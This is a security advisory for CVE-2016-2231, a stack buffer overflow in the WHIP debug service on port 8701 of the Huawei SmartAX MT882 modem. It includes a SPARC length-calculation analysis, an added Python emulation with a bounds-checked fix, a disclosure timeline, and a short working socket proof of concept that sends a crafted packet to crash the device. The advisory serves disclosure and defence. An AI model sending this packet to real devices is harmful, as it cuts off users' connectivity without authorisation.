Security Advisory: WHIP Vulnerability


  • Topic: Denial of Service (DoS) vulnerability in Huawei SmartAX MT882 ADSL Modem.
  • Class: Remote DoS.
  • Severity: Medium.
  • Date published: 2016-02-11
  • Date of last update: 2016-02-11
  • CVE number: CVE-2016-2231
  • Credits: Déborah Valeria Higa
  • Affects:
    • Product name: Huawei SmartAX MT882 ADSL Modem.
    • Affected version: V200R002B022 Arg


I. Background

Huawei SmartAX MT882 includes a Windows-based Host Interface Program (WHIP) service at TCP port 8701 which is used to test and debug the device.


II. Problem Description

The implementation of the WHIP protocol has a security hole in its parser:

  1. Allocates a 0x800-byte buffer on the stack.
  2. Receives a first packet of 4 bytes and stores it in the buffer.
  3. Receives a second packet of N bytes and stores it in the same buffer.

N is derived from the first byte of the first packet.
Assuming that this byte is stored in %o2 (SPARC architecture), this is how N is calculated:

sll %o2, 24, %o2
sra %o2, 24, %o2
inc %o2
sll %o2, 16, %o2
srl %o2, 16, %o2

So, if %o2 has an initial value of 0xFE, the second packet can have a length of 0xFFFF, larger than the buffer can hold.
The vulnerability may also be exploitable as a buffer overflow, in which case the severity would be higher, but this has not yet been verified.
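The following added example (not part of the original advisory) emulates the five SPARC instructions above on a 32-bit register to show how the first header byte becomes N, which header bytes yield an N larger than the 0x800-byte stack buffer, and the bounds check the parser should have applied. The function names and the hardened `safe_length` variant are assumptions for illustration.

```python
"""Emulate the WHIP length computation (sll/sra/inc/sll/srl) on %o2."""

MASK32 = 0xFFFFFFFF
BUFFER_SIZE = 0x800  # stack buffer allocated by the parser (from the advisory)


def sll(reg, n):
    """Logical shift left, truncated to 32 bits."""
    return (reg << n) & MASK32


def srl(reg, n):
    """Logical shift right (zero fill)."""
    return (reg & MASK32) >> n


def sra(reg, n):
    """Arithmetic shift right: replicate bit 31, keep result as unsigned 32-bit."""
    signed = reg - (1 << 32) if reg & 0x80000000 else reg
    return (signed >> n) & MASK32


def whip_length(first_byte):
    """Return N exactly as the firmware derives it from the first header byte."""
    o2 = first_byte & 0xFF
    o2 = sll(o2, 24)        # move the byte into bits 31..24
    o2 = sra(o2, 24)        # sign-extend: 0xFE becomes 0xFFFFFFFE (-2)
    o2 = (o2 + 1) & MASK32  # inc: -2 becomes -1 (0xFFFFFFFF)
    o2 = sll(o2, 16)        # keep only the low 16 bits ...
    o2 = srl(o2, 16)        # ... as an unsigned halfword: 0xFFFF
    return o2


def overflowing_header_bytes(buffer_size=BUFFER_SIZE):
    """Header bytes whose computed N exceeds the stack buffer (0x80..0xFE)."""
    return [b for b in range(256) if whip_length(b) > buffer_size]


def safe_length(first_byte, buffer_size=BUFFER_SIZE):
    """Hardened variant (assumed fix): reject any N that does not fit the buffer."""
    n = whip_length(first_byte)
    if n > buffer_size:
        raise ValueError(f"declared length {n:#x} exceeds buffer {buffer_size:#x}")
    return n
```

Any header byte with the sign bit set (0x80 through 0xFE) produces an N of at least 0xFF81, so the 4-byte header alone tells the parser whether the second packet can fit.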


III. Impact

A remote attacker may be able to exploit the problem by sending the two packets described above to port 8701, causing a DoS that suspends operation of the device.


IV. Supporting Technical Details

– System configuration:

Even when the service is disabled (the default condition), its port is open and the packet is parsed, so the device is still exploitable.
This was checked in the Command Line Interface (CLI) through the UART port.

Users cannot configure any service through the modem’s website.

– Proof of concept:

import socket

# Proof of concept from the advisory: one TCP connection to the WHIP port
# whose first byte (0xFE) yields N = 0xFFFF, followed by more data than the
# 0x800-byte stack buffer can hold. Target address is an example value.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('10.0.0.2', 8701))
s.send(b'\xFE' + b'\x00' * 0x3000)
s.close()


V. Report Timeline

  • 2015-10-31: contact Huawei Product Security Incident Response Team (PSIRT) to inform them that two vulnerabilities have been found in Huawei SmartAX MT882 ADSL Modem. Send a draft advisory with technical details and PoC files.
  • 2015-11-01: Huawei PSIRT acknowledges reception of the advisory.
  • 2015-11-11: Huawei PSIRT confirms the FTP vulnerability and asks for both PoCs and more information about the WHIP service.
  • 2015-11-13: send requested information.
  • 2015-11-16: Huawei PSIRT acknowledges.
  • 2015-11-25: Huawei PSIRT informs that the warranty for the MT882 has expired, but confirms that the replacement product MT882a does not have the two vulnerabilities.
  • 2015-11-25: inform Huawei PSIRT that the MT882 product is still distributed by Argentina’s ISP Arnet.
  • 2015-11-27: Huawei PSIRT acknowledges.
  • 2016-01-15: request a status update.
  • 2016-01-15: Huawei PSIRT informs that they have contacted Argentina’s front line, which has notified Arnet, but the customer has not yet provided a result. Argentina’s front line will ask the customer again next week.
  • 2016-01-22: Huawei PSIRT informs that Arnet uses HG532s as replacement.
  • 2016-01-23: contact Huawei PSIRT to inform them that the investigation is considered closed and ask for confirmation.
  • 2016-01-25: Huawei PSIRT acknowledges.
  • 2016-02-11: Security Advisory published.